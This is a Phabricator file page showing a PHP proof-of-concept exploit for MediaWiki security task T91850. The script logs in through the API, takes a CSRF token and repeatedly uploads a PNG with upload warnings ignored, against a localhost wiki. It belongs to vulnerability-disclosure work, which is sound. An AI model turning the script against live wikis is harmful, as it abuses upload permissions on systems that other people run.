Page MenuHomePhabricator
Files F188249

T91850-exploit.php
csteipp (Chris Steipp)
Actions

Authored By
csteipp
Jul 2 2015, 4:24 PM
Size
3 KB
Referenced Files
None
Subscribers
None

T91850-exploit.php
View Options

<?php
$cookiefile = tempnam( "./", "CurlCookie-" );
$url = 'https://localhost/w/api.php';
$wikiUser = 'NormalUser';
$wikiPass = 'pass';
$file = './2x2.png';
loginApi( $wikiUser, $wikiPass );
$csrftoken = getCsrfToken();
for ( $n = 1; $n < 5; ++$n ) {
$filename = rand() . '-' . basename( $file );
uploadFileApi( $filename, $file, $csrftoken, true );
}
function uploadFileApi( $filename, $file, $csrftoken, $ignoreWarnings = false ) {
global $cookiefile, $url;
echo "Uploading: $filename, $file, $csrftoken\n";
$params = array(
'format'=>'json',
'action'=>'upload',
'token'=>$csrftoken,
'filename'=>$filename,
'file'=>"@$file",
);
if ( $ignoreWarnings ) {
$params['ignorewarnings'] = 1;
}
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_PORT , 443 );
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, 0 );
curl_setopt( $ch, CURLOPT_HEADER, 0 );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt( $ch, CURLOPT_COOKIEJAR, $cookiefile );
curl_setopt( $ch, CURLOPT_COOKIEFILE, $cookiefile );
curl_setopt( $ch, CURLOPT_POST, 1 );
curl_setopt( $ch, CURLOPT_POSTFIELDS, $params );
$data = curl_exec( $ch );
if( !$data ) {
'Curl error: ' . curl_error( $ch );
}
#print_r( $data );
$response = json_decode( $data );
#print_r( $response );
if ( $response->upload->result !== 'Success' ) {
die ("Error uploading file: " . print_r( $response ));
}
echo "Upload Successful\n";
curl_close( $ch );
}
function loginApi( $username, $password ) {
global $cookiefile, $url;
// Get login token
$params = array(
'format'=>'json',
'action'=>'login',
'lgname'=>$username,
'lgpassword'=>'',
);
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_PORT , 443 );
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, 0 );
curl_setopt( $ch, CURLOPT_HEADER, 0 );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt( $ch, CURLOPT_COOKIEJAR, $cookiefile );
curl_setopt( $ch, CURLOPT_COOKIEFILE, $cookiefile );
curl_setopt( $ch, CURLOPT_POST, 1 );
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $params ) );
$data = curl_exec( $ch );
if( !$data ) {
'Curl error: ' . curl_error( $ch );
}
#print_r( $data );
$response = json_decode( $data );
#print_r( $response->login );
echo "Login Token: {$response->login->token}\n";
// Actual login, with csrf token
$params = array(
'format'=>'json',
'action'=>'login',
'lgname'=>$username,
'lgpassword'=>$password,
'lgtoken'=>$response->login->token,
);
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $params ) );
$data = curl_exec( $ch );
#print_r( $data );
$response = json_decode( $data );
if ( $response->login->result !== 'Success' ) {
die( "Error logging in: " . print_r( $response, true ) );
}
curl_close( $ch );
echo "Login successful!\n";
}
function getCsrfToken( ) {
global $url, $cookiefile;
$params = array(
'format'=>'json',
'action'=>'query',
'meta'=>'tokens',
);
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_PORT , 443 );
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, 0 );
curl_setopt( $ch, CURLOPT_HEADER, 0 );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt( $ch, CURLOPT_COOKIEJAR, $cookiefile );
curl_setopt( $ch, CURLOPT_COOKIEFILE, $cookiefile );
curl_setopt( $ch, CURLOPT_POST, 1 );
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $params ) );
$data = curl_exec( $ch );
if( !$data ) {
'Curl error: ' . curl_error( $ch );
}
#print_r( $data );
$response = json_decode( $data );
#print_r( $response );
echo "CSRF Token: {$response->query->tokens->csrftoken}\n";
curl_close( $ch );
return $response->query->tokens->csrftoken;
}

File Metadata

Mime Type
text/x-php
Storage Engine
blob
Storage Format
Raw Data
Storage Handle
180720
Default Alt Text
T91850-exploit.php (3 KB)

Event Timeline

Content licensed under Creative Commons Attribution-ShareAlike (CC BY-SA) 4.0 unless otherwise noted; code licensed under GNU General Public License (GPL) 2.0 or later and other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL · Credits